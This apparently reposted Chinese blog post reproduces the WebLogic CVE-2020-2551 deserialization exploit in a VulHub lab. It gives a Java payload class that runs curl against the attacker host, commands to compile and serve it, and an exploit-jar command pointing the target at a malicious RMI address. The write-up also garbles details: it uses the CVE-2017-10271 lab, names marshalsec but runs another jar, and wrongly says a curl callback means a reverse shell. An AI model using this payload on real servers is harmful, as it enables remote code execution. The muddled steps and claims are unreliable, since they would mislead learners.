博客
关于我
Weblogic CVE-2020-2551漏洞复现
阅读量:438 次
发布时间:2019-03-06

本文共 1292 字,大约阅读时间需要 4 分钟。

WebLogic CVE-2020-2551漏洞复现

前言

在一次渗透测试任务中,我意外发现了WebLogic服务器存在一个严重的安全漏洞,即CVE-2020-2551。为了验证漏洞的存在与否,我使用了网络上流传的POC工具进行测试,但未能成功。这让我对漏洞的复现过程产生了浓厚兴趣,于是决定亲自动手复现和利用此漏洞。

漏洞环境

靶机环境:

  • VulHub虚拟环境:vulhub-weblogic-CVE-2017-10271
  • IP地址:172.16.10.26
  • 端口:7001

攻击机环境:

  • 攻击机IP:192.168.82.134

漏洞利用

首先,使用Docker启动一个WebLogic环境,进入路径vulhub/weblogic/CVE-2017-1027,运行以下命令:

docker-compose up -d

使用docker ps命令确认服务是否启动成功:

docker ps

接下来,访问本地的7001端口,页面显示说明服务已成功启动。通过POC工具验证漏洞是否存在,结果表明目标服务器确实存在CVE-2020-2551漏洞。

为了利用此漏洞,我编写了一个Java程序exp.java

import java.io.IOException;public class exp {    static {        try {            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","curl http://192.168.82.134/sangforNP"});        } catch (IOException e) {            e.printStackTrace();        }    }    public static void main(String[] args) {    }}

将文件编译:

javac exp.java -source 1.6 -target 1.6

生成exp.class文件后,在当前目录下使用Python启动一个简单的HTTP服务:

python3 -m http.server 80

同时,使用marshalsec启动一个恶意的RMI服务:

java -jar weblogic_CVE_2020_2551.jar 172.16.10.26 7001 rmi://192.168.82.134:1099/exp

观察HTTP服务日志,检查是否出现sangforNP的记录。如果成功,说明已成功获取到反弹shell。

通过对漏洞的深入研究,我在内部网盘上找到了一个完整的利用工具,这让我对WebLogic漏洞的利用有了更深的理解。这次复现让我更加熟悉了WebLogic服务器的安全性,以及如何通过合理的渗透测试发现潜在的安全风险。

免责声明

本文仅用于技术交流和学习,严禁用于非法操作。如您利用文章中介绍的知识对他人造成损失,后果需自行承担。如无法接受此约定,请不要阅读本文。感谢您的理解与配合!

转载地址:http://geakz.baihongyu.com/

你可能感兴趣的文章
Netpas:不一样的SD-WAN+ 保障网络通讯品质
查看>>
NetScaler的常用配置
查看>>
netsh advfirewall
查看>>
NETSH WINSOCK RESET这条命令的含义和作用?
查看>>
Netty WebSocket客户端
查看>>
netty 主要组件+黏包半包+rpc框架+源码透析
查看>>
Netty 异步任务调度与异步线程池
查看>>
Netty中集成Protobuf实现Java对象数据传递
查看>>
Netty事件注册机制深入解析
查看>>
Netty原理分析及实战(四)-客户端与服务端双向通信
查看>>
Netty客户端断线重连实现及问题思考
查看>>
Netty工作笔记0006---NIO的Buffer说明
查看>>
Netty工作笔记0007---NIO的三大核心组件关系
查看>>
Netty工作笔记0011---Channel应用案例2
查看>>
Netty工作笔记0013---Channel应用案例4Copy图片
查看>>
Netty工作笔记0014---Buffer类型化和只读
查看>>
Netty工作笔记0020---Selectionkey在NIO体系
查看>>
Vue踩坑笔记 - 关于vue静态资源引入的问题
查看>>
Netty工作笔记0025---SocketChannel API
查看>>
Netty工作笔记0027---NIO 网络编程应用--群聊系统2--服务器编写2
查看>>